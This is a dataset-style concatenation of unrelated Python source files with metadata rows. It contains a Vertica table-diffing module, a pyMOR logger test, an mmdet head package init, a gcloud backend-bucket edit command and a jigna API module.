y_table_info_lookup = get_column_info_lookup(cur, y_schema, y_table)
def comparable_(x, y) -> bool:
# this doesn't capture the case where they both could be converted to float to be compared (two hop conversions):
if (x is None) or (y is None):
return False
x_or_y = implicit_dtype_comparison(x, y) or implicit_dtype_comparison(y, x)
return x_or_y
all_keys = list(x_table_info_lookup.keys()) + list(y_table_info_lookup.keys())
all_col_info = {col: {'x_dtype': x_table_info_lookup.get(col, None),
'y_dtype': y_table_info_lookup.get(col, None),
'comparable': comparable_(x_table_info_lookup.get(col, None), y_table_info_lookup.get(col, None)),
'exclude': (col in exclude_columns_set)
} for col in all_keys}
LOGGER.debug(all_col_info)
all_col_info_df = pd.DataFrame(all_col_info).transpose()
if save_column_summary:
if save_column_summary_format.lower() == 'csv':
all_col_info_df.to_csv(Path(x_table + '_col_info.csv'))
if save_column_summary_format.lower() == 'pickle':
all_col_info_df.to_pickle(Path(x_table + '_col_info.pkl'))
else:
LOGGER.info("All column info:\n" + all_col_info_df.to_string())
LOGGER.info("Missing columns in x:\n" + all_col_info_df.loc[all_col_info_df.x_dtype.isnull(), :].to_string())
LOGGER.info("Missing columns in y:\n" + all_col_info_df.loc[all_col_info_df.y_dtype.isnull(), :].to_string())
LOGGER.debug(all_col_info_df.comparable)
LOGGER.debug(~all_col_info_df.comparable)
LOGGER.info("These columns have incompatible dtypes, specifically neither of them can be implicitly converted to the other:\n" + all_col_info_df.loc[(~all_col_info_df.comparable).astype('bool'), :].to_string())
return all_col_info_df
def select_distinct_rows(cur: Cursor,
schema: str, table: str,
join_cols: list,
use_temp_tables: bool = False) -> Tuple[str, str]:
'''Select only the rows that are distinct on join_cols.
*Instead of deleting the rows, we'll select those without duplicates into a
new table, and return the name of that new table.
Delete is inefficient, see: https://www.vertica.com/docs/9.2.x/HTML/Content/Authoring/AnalyzingData/Optimizations/PerformanceConsiderationsForDELETEAndUPDATEQueries.htm
And: https://www.vertica.com/blog/another-way-to-de-duplicate-table-rows-quick-tip/
'''
drop_q = JINJA_ENV.get_template('table_drop.sql').render(schema_name=schema, table_name=(table + '_dedup'))
LOGGER.info(drop_q)
cur.execute(drop_q)
q = JINJA_ENV.get_template('create_dedup.sql').render(
schema_name=schema, table_name=table,
table_name_dedup=(table + '_dedup'),
group_cols=', '.join(join_cols),
join_cols=' AND '.join(['x.{0} <=> y.{0}'.format(col) for col in join_cols]),
use_temp_table=use_temp_tables
)
if use_temp_tables:
q = JINJA_ENV.get_template('create_temp_table.sql').render(table_name=(table + '_dedup'), query=q)
LOGGER.info(q)
cur.execute(q)
LOGGER.info('COMMIT;')
cur.execute('COMMIT;')
drop_q = JINJA_ENV.get_template('table_drop.sql').render(schema_name=schema, table_name=(table + '_dup'))
LOGGER.info(drop_q)
cur.execute(drop_q)
q = JINJA_ENV.get_template('create_dup.sql').render(
schema_name=schema, table_name=table,
table_name_dup=(table + '_dup'),
group_cols=', '.join(join_cols),
join_cols=' AND '.join(['x.{0} <=> y.{0}'.format(col) for col in join_cols]),
use_temp_table=use_temp_tables
)
if use_temp_tables:
q = JINJA_ENV.get_template('create_temp_table.sql').render(table_name=(table + '_dup'), query=q)
LOGGER.info(q)
cur.execute(q)
LOGGER.info('COMMIT;')
cur.execute('COMMIT;')
return (schema, 'v_temp_schema')[use_temp_tables], '{table}_dedup'.format(table=table)
def create_joined_table(cur: Cursor, create_insert=False, **kwargs):
"""
Joins two tables x and y.
:param cur: vertica python Cursor
:return: list - all queries run.
"""
drop_q = JINJA_ENV.get_template('table_drop.sql').render(
schema_name=kwargs['joined_schema'],
table_name=kwargs['joined_table'])
LOGGER.info(drop_q)
cur.execute(drop_q)
if create_insert:
# these separately do CREATE TABLE and then
# INSERT INTO
create_q = JINJA_ENV.get_template('create_joined_table.sql').render(kwargs)
LOGGER.info(create_q)
cur.execute(create_q)
insert_q = JINJA_ENV.get_template('insert_joined_table.sql').render(kwargs)
LOGGER.info(insert_q)
cur.execute(insert_q)
else:
# this does a SELECT INTO
join_q = JINJA_ENV.get_template('create_joined_table_from_selectinto.sql').render(kwargs)
LOGGER.info(join_q)
cur.execute(join_q)
LOGGER.info('COMMIT;')
cur.execute('COMMIT;')
table_rows_q = JINJA_ENV.get_template('table_rows.sql').render(
schema_name=kwargs['joined_schema'],
table_name=kwargs['joined_table'])
LOGGER.info(table_rows_q)
cur.execute(table_rows_q)
r = cur.fetchall()
joined_row_count = r[0]['COUNT']
return joined_row_count
def get_unmatched_rows_straight(
cur: Cursor,
x_schema: str,
y_schema: str,
x_table: str,
y_table: str,
join_cols: list,
max_rows_column: int
) -> Dict[str, Dict[str, Any]]:
'''
Get rows that don't match on a join using all of the keys ("straight").
'''
all_keys_count = JINJA_ENV.get_template('all_keys_count.sql')
all_keys_sample = JINJA_ENV.get_template('all_keys_sample.sql')
results = {'x': {'count': 0, 'query': 'select ...', 'sample': pd.DataFrame()},
'y': {'count': 0, 'query': 'select ...', 'sample': pd.DataFrame()}}
for side in {'x', 'y'}:
d = {
'x_schema': x_schema,
'y_schema': y_schema,
'x_table': x_table,
'y_table': y_table,
'join_cols': join_cols,
'x': (side == 'x'),
'max_rows_column': max_rows_column
}
q = all_keys_count.render(d)
cur.execute(q)
r = cur.fetchall()
results[side]['count'] = r[0]['COUNT']
results[side]['query'] = all_keys_sample.render(d)
cur.execute(results[side]['query'])
results[side]['sample'] = pd.DataFrame(cur.fetchall())
return results
def get_unmatched_rows(
cur: Cursor,
x_schema: str,
y_schema: str,
x_table: str,
y_table: str,
join_cols: list,
max_rows_column: int
) -> Dict[Any, Dict[str, Dict[str, Any]]]:
'''
Pull out rows that are unmatched between the two tables on the join columns.
If looking at this hierarchically, we consider the join by
key a, then key a+b (where a matched), then key a+b+c (where a+b matched), etc
to see at what level we're missing things.
'''
results = {col: {'x': {'count': 0, 'query': 'select ...', 'sample': pd.DataFrame()},
'y': {'count': 0, 'query': 'select ...', 'sample': pd.DataFrame()}} for col in join_cols}
first_key_count = JINJA_ENV.get_template('first_key_count.sql')
first_key_t = JINJA_ENV.get_template('first_key_sample.sql')
sub_keys_count = JINJA_ENV.get_template('sub_keys_count.sql')
sub_keys_t = JINJA_ENV.get_template('sub_keys_sample.sql')
sub_keys_g = JINJA_ENV.get_template('sub_keys_grouped.sql')
LOGGER.info('Getting rows that did not match on only the first join column: ' + join_cols[0] + '.')
for side in {'x', 'y'}:
d = {
'x_schema': x_schema,
'y_schema': y_schema,
'x_table': x_table,
'y_table': y_table,
'join_col': join_cols[0],
'x': (side == 'x'),
'max_rows_column': max_rows_column
}
q = first_key_count.render(d)
cur.execute(q)
r = cur.fetchall()
results[join_cols[0]][side]['count'] = r[0]['COUNT']
results[join_cols[0]][side]['query'] = first_key_t.render(d)
cur.execute(results[join_cols[0]][side]['query'])
results[join_cols[0]][side]['sample'] = pd.DataFrame(cur.fetchall())
for i in range(1, len(join_cols)):
LOGGER.info('Getting rows that did not match on the ' + str(i + 1) + '-nd/rd/th join column: ' + join_cols[i] + '.')
LOGGER.info('This is equivalent to joining the tables on unique rows of ' + ','.join(join_cols[:(i + 1)]) + ' where all but the last already exist.')
for side in {'x', 'y'}:
d = {
'x_schema': x_schema,
'y_schema': y_schema,
'x_table': x_table,
'y_table': y_table,
'join_cols': join_cols[:(i + 1)],
'x': (side == 'x'),
'max_rows_column': max_rows_column
}
q = sub_keys_count.render(d)
cur.execute(q)
r = cur.fetchall()
results[join_cols[i]][side]['count'] = r[0]['COUNT']
results[join_cols[i]][side]['query'] = sub_keys_t.render(d)
cur.execute(results[join_cols[i]][side]['query'])
results[join_cols[i]][side]['sample'] = pd.DataFrame(cur.fetchall())
results[join_cols[i]][side]['query_grouped'] = sub_keys_g.render(d)
cur.execute(results[join_cols[i]][side]['query_grouped'])
results[join_cols[i]][side]['sample_grouped'] = pd.DataFrame(cur.fetchall())
return results
def create_diff_table(cur: Cursor,
schema: str, table: str,
join_cols: list, all_col_info_df: pd.DataFrame) -> str:
drop_q = JINJA_ENV.get_template('table_drop.sql').render(schema_name=schema, table_name=table)
# so simple that putting into a template would make this harder to follow...
q = 'CREATE TABLE {schema}.{table} ( {columns}, column_name VARCHAR(255) );'.format(
schema=schema,
table=table,
columns=', '.join(all_col_info_df.loc[all_col_info_df.index.isin(join_cols)].apply(lambda x: ' '.join([x.name, x.x_dtype]), axis=1).values)
)
cur.execute(drop_q)
cur.execute(q)
return q
def insert_diff_table(cur: Cursor, **kwargs) -> None:
cur.execute(JINJA_ENV.get_template('insert_diff.sql').render(kwargs))
cur.execute('COMMIT;')
def get_diff_rows(cur: Cursor,
output_schema: str,
x_table: str,
join_cols: list,
max_rows_all: int,
skip_row_total: bool = False) -> dict:
LOGGER.debug("Getting diff rows")
# first get the count
q = JINJA_ENV.get_template('table_rows.sql').render(
schema_name=output_schema,
table_name=(x_table + '_DIFF'))
LOGGER.info(q)
cur.execute(q)
diff_total_count = cur.fetchall()[0]['COUNT']
if skip_row_total:
LOGGER.debug("Skipping sample of rows with differences, query to get that sample, and the total # of rows with > 0 differences. Returning only 'total_count', the sum of cell-by-cell differences.")
return {'total_count': diff_total_count}
q = JINJA_ENV.get_template('table_rows_uniq.sql').render(schema_name=output_schema, table_name=(x_table + '_DIFF'), join_cols=', '.join(join_cols))
LOGGER.info(q)
cur.execute(q)
diff_row_count = cur.fetchall()[0]['COUNT']
# we'll pull all columns from the joined table
q = JINJA_ENV.get_template('diff_rows_sample.sql').render(
schema_name=output_schema,
joined_table=(x_table + '_JOINED'),
diff_table=(x_table + '_DIFF'),
group_cols=', '.join(join_cols),
join_cols=' AND '.join(['x.{0} <=> joined.{0}'.format(col) for col in join_cols])
)
LOGGER.info(q)
cur.execute(q + ' LIMIT ' + str(max_rows_all))
diff_rows = pd.DataFrame(cur.fetchall())
return {'query': q, 'sample': diff_rows,
'count': diff_row_count, 'total_count': diff_total_count}
def get_diff_rows_from_joined(cur: Cursor,
grouped_column_diffs: dict,
output_schema: str,
x_table: str,
join_cols: list,
max_rows_all: int,
skip_row_total: bool = False) -> dict:
'''Get diff rows from joined table.
Non self-explanatory argument specifics:
- grouped_column_diffs:
- max_rows_all: number of rows to get for the sample (only relevant if skip_row_total=F)
- skip_row_total: skip sample of rows with differences, query to get that sample, and the total # of rows with > 0 differences. Return only 'total_count', the sum of cell-by-cell differences.
Returned data specifics:
- dict with 4 keys:
- total_count: total number of cell-by-cell differences between the two tables.
- query: query to get a sample of rows with >0 differences.
- sample: dataframe of those sample rows
- count: count of rows with >0 differences.
'''
LOGGER.debug("Getting diff rows: get_diff_rows_from_joined()")
diff_total_count = sum([info['count'] for info in grouped_column_diffs.values()])
if skip_row_total or (len(grouped_column_diffs) == 0):
LOGGER.debug("Skipping sample of rows with differences, query to get that sample, and the total # of rows with > 0 differences. Returning only 'total_count', the sum of cell-by-cell differences.")
return {
'sample': [],
'count': 0,
'total_count': diff_total_count
}
LOGGER.info(grouped_column_diffs)
q = JINJA_ENV.get_template('joined_rows_count.sql').render(
joined_schema=output_schema,
joined_table=(x_table + '_JOINED'),
columns=grouped_column_diffs.keys()
)
LOGGER.info(q)
cur.execute(q)
diff_row_count = cur.fetchall()[0]['COUNT']
# we'll pull all columns from the joined table
q = JINJA_ENV.get_template('joined_rows_sample.sql').render(
joined_schema=output_schema,
joined_table=(x_table + '_JOINED'),
columns=grouped_column_diffs.keys()
)
LOGGER.info(q)
cur.execute(q + ' LIMIT ' + str(max_rows_all))
diff_rows = pd.DataFrame(cur.fetchall())
return {'query': q, 'sample': diff_rows,
'count': diff_row_count, 'total_count': diff_total_count}
def get_diff_columns(cur: Cursor, output_schema: str, x_table: str) -> pd.DataFrame:
LOGGER.debug("Getting diff columns")
# The # of columns has a hard limit (~1600 in Vertica?) so don't worry about
# pulling the count first or limiting the results
q = JINJA_ENV.get_template('diff_column_summary.sql').render(
schema_name=output_schema,
table_name=(x_table + '_DIFF'))
cur.execute(q)
return pd.DataFrame(cur.fetchall())
def get_column_diffs(diff_columns: pd.DataFrame, cur: Cursor,
output_schema: str,
x_schema: str, x_table: str,
y_schema: str, y_table: str,
join_cols: list,
max_rows_column: int,
all_col_info_df: pd.DataFrame,
hierarchical: bool = False) -> dict:
LOGGER.debug("Getting column diffs")
# get total count, list of most common differing pairs for each column
# list of (count, query, df)
grouped_column_diffs = {row.column_name: {'count': row['COUNT']} for i, row in diff_columns.iterrows()}
for column_name, info in grouped_column_diffs.items():
LOGGER.info('Getting detailed diff for column: ' + str(column_name) + ' with ' + str(info['count']) + ' differences.')
q = JINJA_ENV.get_template('diff_column.sql').render(
column=column_name,
joined_schema=output_schema, joined_table=(x_table + '_JOINED'),
diff_schema=output_schema, diff_table=(x_table + '_DIFF'),
group_cols=', '.join(join_cols),
join_cols=' AND '.join(['diff.{0} <=> joined.{0}'.format(col) for col in join_cols]),
)
info['q'] = q
q_raw = JINJA_ENV.get_template('diff_column_raw.sql').render(
column=column_name,
joined_schema=output_schema, joined_table=(x_table + '_JOINED'),
diff_schema=output_schema, diff_table=(x_table + '_DIFF'),
join_cols=join_cols,
join_cols_join=' AND '.join(['diff.{0} <=> joined.{0}'.format(col) for col in join_cols]),
)
info['q_raw'] = q_raw
cur.execute(q + ' LIMIT ' + str(max_rows_column))
info['df'] = pd.DataFrame(cur.fetchall())
cur.execute(q_raw + ' LIMIT ' + str(max_rows_column))
info['df_raw'] = pd.DataFrame(cur.fetchall())
if hierarchical:
for schema, table, side in ((x_schema, x_table, 'x'), (y_schema, y_table, 'y')):
for limit in (None, max_rows_column):
q_h = JINJA_ENV.get_template('diff_column_hier.sql').render(
column=column_name,
diff_schema=output_schema,
diff_table=(x_table + '_DIFF'),
join_cols=', '.join(join_cols),
first_join_col=join_cols[0],
schema=schema,
table=table,
limit=limit
)
if limit is None:
info['q_h_' + side] = q_h
else:
cur.execute(q_h)
info['df_h_' + side] = pd.DataFrame(cur.fetchall())
row = all_col_info_df.loc[column_name, :]
is_numeric = (is_numeric_like(row.x_dtype) and is_numeric_like(row.y_dtype))
is_date = (is_date_like(row.x_dtype) and is_date_like(row.y_dtype))
if is_numeric or is_date:
info['q_n'] = JINJA_ENV.get_template('diff_column_numeric_diffs_binned.sql').render(
column=column_name,
joined_schema=output_schema, joined_table=(x_table + '_JOINED'),
diff_schema=output_schema, diff_table=(x_table + '_DIFF'),
group_cols=', '.join(join_cols),
join_cols=' AND '.join(['diff.{0} <=> joined.{0}'.format(col) for col in join_cols]),
tiles=min({max({1, info['count']}), 10}))
cur.execute(info['q_n'])
info['df_n'] = pd.DataFrame(cur.fetchall())
info['q_n_sample'] = JINJA_ENV.get_template('diff_column_numeric_diffs_sorted.sql').render(
column=column_name,
joined_schema=output_schema, joined_table=(x_table + '_JOINED'),
diff_schema=output_schema, diff_table=(x_table + '_DIFF'),
join_cols=join_cols,
join_cols_join=' AND '.join(['diff.{0} <=> joined.{0}'.format(col) for col in join_cols]),
)
cur.execute(info['q_n_sample'] + ' LIMIT ' + str(max_rows_column))
info['df_n_sample'] = pd.DataFrame(cur.fetchall())
return grouped_column_diffs
def get_column_diffs_from_joined(cur: Cursor,
output_schema: str,
x_schema: str, x_table: str,
y_schema: str, y_table: str,
join_cols: list,
max_rows_column: int,
all_col_info_df: pd.DataFrame,
comparable_filter,
hierarchical: bool = False) -> dict:
'''Get column-by-column diffs directly from the joined table.
Non self-explanatory argument specifics:
- max_rows_column: number of rows to pull for sample differing cells on each column.
- all_col_info_df: dataframe with the following columns:
- index: column names.
- x_dtype.
- y_dtype.
- comparable_filter: an 0/1 index on all_col_info_df to filter on columns to compare.
- in cli.py, this filter/index is set using datatype matching and the user-supplied list of columns to exclude.
- hierarchical: if true, additional outputs are included for each columns that are samples with the join keys.
Returned data specifics:
- dict grouped_column_diffs:
- each `key` is a string column name for columns that matches on name between x and y tables (and are comparable on dtype, not excluded by user-supplied list).
- each `value` is a dictionary with the following keys:
- {'count': diff_count, 'df': df, 'df_raw': df_raw, 'q': q, 'q_raw': q_raw}.
- if `hierarchical` is true: `{q,d}_h_{x,y}` (q for query, d for dataframe sample) from x and y tables, respectively.
- if numeric of date: `{q,df}_n{,_sample}` (q for query, df for dataframe), the `_sample` is the biggest diffs, while the former are the binned differences.
'''
column_list_to_compare = all_col_info_df.loc[comparable_filter & ~all_col_info_df.index.isin(join_cols), :].index.values
LOGGER.info("Getting column diffs for columns:")
LOGGER.info(",".join(column_list_to_compare))
grouped_column_diffs = {}
for column in column_list_to_compare:
LOGGER.info("=" * 80)
LOGGER.info(column)
joined_count_q = JINJA_ENV.get_template('joined_count.sql').render(
column=column,
joined_schema=output_schema,
joined_table=(x_table + '_JOINED')
)
LOGGER.info(joined_count_q)
cur.execute(joined_count_q)
diff_count = cur.fetchall()[0]['COUNT']
if diff_count > 0:
LOGGER.info('Getting detailed diff for column: ' + str(column) + ' with ' + str(diff_count) + ' differences.')
q = JINJA_ENV.get_template('joined_column.sql').render(
column=column,
joined_schema=output_schema, joined_table=(x_table + '_JOINED')
)
q_raw = JINJA_ENV.get_template('joined_column_raw.sql').render(
column=column,
joined_schema=output_schema, joined_table=(x_table + '_JOINED'),
join_cols=join_cols
)
LOGGER.info(q)
cur.execute(q + ' LIMIT ' + str(max_rows_column))
df = pd.DataFrame(cur.fetchall())
LOGGER.info(q_raw)
cur.execute(q_raw + ' LIMIT ' + str(max_rows_column))
df_raw = pd.DataFrame(cur.fetchall())
grouped_column_diffs[column] = {'count': diff_count, 'df': df, 'df_raw': df_raw, 'q': q, 'q_raw': q_raw}
LOGGER.info(grouped_column_diffs[column])
if hierarchical:
for schema, table, side in ((x_schema, x_table, 'x'), (y_schema, y_table, 'y')):
for limit in (None, max_rows_column):
q_h = JINJA_ENV.get_template('joined_column_hier.sql').render(
column=column,
joined_schema=output_schema, joined_table=(x_table + '_JOINED'),
join_cols=join_cols,
schema=schema,
table=table,
limit=limit
)
if limit is None:
grouped_column_diffs[column]['q_h_' + side] = q_h
else:
cur.execute(q_h)
grouped_column_diffs[column]['df_h_' + side] = pd.DataFrame(cur.fetchall())
row = all_col_info_df.loc[column, :]
is_numeric = (is_numeric_like(row.x_dtype) and is_numeric_like(row.y_dtype))
is_date = (is_date_like(row.x_dtype) and is_date_like(row.y_dtype))
if is_numeric or is_date:
grouped_column_diffs[column]['q_n'] = JINJA_ENV.get_template('joined_column_numeric_diffs_binned.sql').render(
column=column,
joined_schema=output_schema, joined_table=(x_table + '_JOINED'),
tiles=min({max({1, grouped_column_diffs[column]['count']}), 10}))
cur.execute(grouped_column_diffs[column]['q_n'])
grouped_column_diffs[column]['df_n'] = pd.DataFrame(cur.fetchall())
grouped_column_diffs[column]['q_n_sample'] = JINJA_ENV.get_template('joined_column_numeric_diffs_sorted.sql').render(
column=column,
joined_schema=output_schema, joined_table=(x_table + '_JOINED'),
join_cols=join_cols
)
cur.execute(grouped_column_diffs[column]['q_n_sample'] + ' LIMIT ' + str(max_rows_column))
grouped_column_diffs[column]['df_n_sample'] = pd.DataFrame(cur.fetchall())
else:
LOGGER.info('NOT getting detailed diff for column: ' + str(column) + ' with ' + str(diff_count) + ' differences.')
LOGGER.info(len(grouped_column_diffs))
grouped_column_diffs_sorted = {x: grouped_column_diffs[x] for x in sorted(grouped_column_diffs.keys(), key=lambda x: grouped_column_diffs[x]['count'], reverse=True)}
LOGGER.info(len(grouped_column_diffs_sorted))
return grouped_column_diffs_sorted
| 46.248288 | 214 | 0.614758 |
acfb71dacff93654acba672b65d01246085593d3 | 1,263 | py | Python | src/pymortests/core/logger.py | hvhue/pymor | 0815d74514fa5c4e0ad6f379f29abdd7d067cedd | [
"Unlicense"
] | null | null | null | src/pymortests/core/logger.py | hvhue/pymor | 0815d74514fa5c4e0ad6f379f29abdd7d067cedd | [
"Unlicense"
] | null | null | null | src/pymortests/core/logger.py | hvhue/pymor | 0815d74514fa5c4e0ad6f379f29abdd7d067cedd | [
"Unlicense"
] | null | null | null | # This file is part of the pyMOR project (http://www.pymor.org).
# Copyright 2013-2020 pyMOR developers and contributors. All rights reserved.
# License: BSD 2-Clause License (http://opensource.org/licenses/BSD-2-Clause)
import logging
import pymor.core as core
from pymor.core.logger import log_levels
from pymor.operators.numpy import NumpyMatrixOperator
from pymortests.base import (runmodule,)
def test_logger():
logger = NumpyMatrixOperator._logger
for lvl in [getattr(logging, lvl) for lvl in ['WARN', 'ERROR', 'DEBUG', 'INFO']]:
logger.setLevel(lvl)
assert logger.isEnabledFor(lvl)
for verb in ['warning', 'error', 'debug', 'info']:
getattr(logger, verb)(f'{verb} -- logger {str(logger)}')
def test_empty_log_message():
core.logger.getLogger('test').warn('')
def test_log_levels():
logger = NumpyMatrixOperator._logger
before_name = 'INFO'
logger.setLevel(before_name)
before = logger.level
with log_levels({logger.name: 'DEBUG'}):
assert 'DEBUG' == logging.getLevelName(logger.level)
assert logger.level != before
assert logger.level == before
assert before_name == logging.getLevelName(logger.level)
if __name__ == "__main__":
runmodule(filename=__file__)
| 31.575 | 85 | 0.706255 |
acfb71ebebe0bdd5c0601073409a77ddae1e1b1e | 371 | py | Python | detection/scrfd/mmdet/models/roi_heads/bbox_heads/__init__.py | qaz734913414/insightface | 4101fe608ca1d38604a23d53f32314ce8a28fe79 | [
"MIT"
] | 12,377 | 2017-12-04T02:46:57.000Z | 2022-03-31T16:48:31.000Z | mmdet/models/roi_heads/bbox_heads/__init__.py | Oz-art/mmdetection | d3cf38d91c454b1a6881e8c36c1e4a66dc5521b8 | [
"Apache-2.0"
] | 1,851 | 2017-12-05T05:41:23.000Z | 2022-03-30T13:06:22.000Z | mmdet/models/roi_heads/bbox_heads/__init__.py | Oz-art/mmdetection | d3cf38d91c454b1a6881e8c36c1e4a66dc5521b8 | [
"Apache-2.0"
] | 4,198 | 2017-12-05T02:57:19.000Z | 2022-03-30T10:29:37.000Z | from .bbox_head import BBoxHead
from .convfc_bbox_head import (ConvFCBBoxHead, Shared2FCBBoxHead,
Shared4Conv1FCBBoxHead)
from .double_bbox_head import DoubleConvFCBBoxHead
from .sabl_head import SABLHead
__all__ = [
'BBoxHead', 'ConvFCBBoxHead', 'Shared2FCBBoxHead',
'Shared4Conv1FCBBoxHead', 'DoubleConvFCBBoxHead', 'SABLHead'
]
| 33.727273 | 65 | 0.74124 |
acfb72d7600e44ba1ef4a2bdd59722f5cb1b861d | 265 | py | Python | hyer/__init__.py | pyx/hyer | cd3a27f2194a7f02eb9a14788f599fe3efe85f10 | [
"BSD-3-Clause"
] | 17 | 2015-02-27T04:48:08.000Z | 2021-09-23T09:01:07.000Z | hyer/__init__.py | pyx/hyer | cd3a27f2194a7f02eb9a14788f599fe3efe85f10 | [
"BSD-3-Clause"
] | null | null | null | hyer/__init__.py | pyx/hyer | cd3a27f2194a7f02eb9a14788f599fe3efe85f10 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2014-2016, Philip Xu <pyx@xrefactor.com>
# License: BSD New, see LICENSE for details.
"""Hyer - Hy enhanced routing"""
__version__ = (0, 1)
__release__ = '.dev0'
VERSION = '%d.%d' % __version__ + __release__
__all__ = [
]
| 20.384615 | 56 | 0.645283 |
acfb72e9ab30e5c24bd73a64b884921ef73e3cc9 | 2,735 | py | Python | lib/surface/compute/backend_buckets/edit.py | bopopescu/SDK | e6d9aaee2456f706d1d86e8ec2a41d146e33550d | [
"Apache-2.0"
] | null | null | null | lib/surface/compute/backend_buckets/edit.py | bopopescu/SDK | e6d9aaee2456f706d1d86e8ec2a41d146e33550d | [
"Apache-2.0"
] | null | null | null | lib/surface/compute/backend_buckets/edit.py | bopopescu/SDK | e6d9aaee2456f706d1d86e8ec2a41d146e33550d | [
"Apache-2.0"
] | 2 | 2020-11-04T03:08:21.000Z | 2020-11-05T08:14:41.000Z | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command for modifying backend buckets."""
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.calliope import base
@base.ReleaseTracks(base.ReleaseTrack.ALPHA)
class EditAlpha(base_classes.BaseEdit):
"""Modify backend buckets."""
@staticmethod
def Args(parser):
base_classes.BaseEdit.Args(parser)
parser.add_argument(
'name',
help='The name of the backend bucket to modify.')
@property
def service(self):
return self.compute.backendBuckets
@property
def resource_type(self):
return 'backendBuckets'
@property
def example_resource(self):
uri_prefix = ('https://www.googleapis.com/compute/alpha/projects/'
'my-project/')
return self.messages.BackendBucket(
bucketName='gcs-bucket-1',
description='My backend bucket',
name='backend-bucket',
selfLink=uri_prefix + 'global/backendBuckets/backend-bucket',
)
def CreateReference(self, args):
return self.CreateGlobalReference(args.name)
@property
def reference_normalizers(self):
return []
def GetGetRequest(self, args):
return (
self.service,
'Get',
self.messages.ComputeBackendBucketsGetRequest(
project=self.project,
backendBucket=self.ref.Name()))
def GetSetRequest(self, args, replacement, _):
return (
self.service,
'Update',
self.messages.ComputeBackendBucketsUpdateRequest(
project=self.project,
backendBucket=self.ref.Name(),
backendBucketResource=replacement))
EditAlpha.detailed_help = {
'brief': 'Modify backend buckets',
'DESCRIPTION': """\
*{command}* can be used to modify a backend bucket. The backend
bucket resource is fetched from the server and presented in a text
editor. After the file is saved and closed, this command will
update the resource. Only fields that can be modified are
displayed in the editor.
The editor used to modify the resource is chosen by inspecting
the ``EDITOR'' environment variable.
""",
}
| 30.730337 | 74 | 0.690676 |
acfb738f8c8a6c5697ae1387d06ca5cfc7cab8ba | 304 | py | Python | jigna/api.py | David-Baddeley/jigna | 00192450515099d8abc74866ffe1e4f743fe2279 | [
"BSD-3-Clause"
] | 17 | 2015-02-19T15:35:09.000Z | 2021-06-21T09:50:00.000Z | jigna/api.py | David-Baddeley/jigna | 00192450515099d8abc74866ffe1e4f743fe2279 | [
"BSD-3-Clause"
] | 41 | 2015-02-12T13:15:01.000Z | 2019-07-22T21:06:23.000Z | jigna/api.py | David-Baddeley/jigna | 00192450515099d8abc74866ffe1e4f743fe2279 | [
"BSD-3-Clause"
] | 14 | 2015-02-26T06:19:27.000Z | 2020-11-03T07:10:11.000Z | from .template import Template
from .vue_template import VueTemplate
from .core.concurrent import Future
from .html_widget import HTMLWidget
# Wrapping the WebApp import so that you can use jigna even if you don't have
# tornado install
try:
from .web_app import WebApp
except ImportError:
pass
| 25.333333 | 77 | 0.792763 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.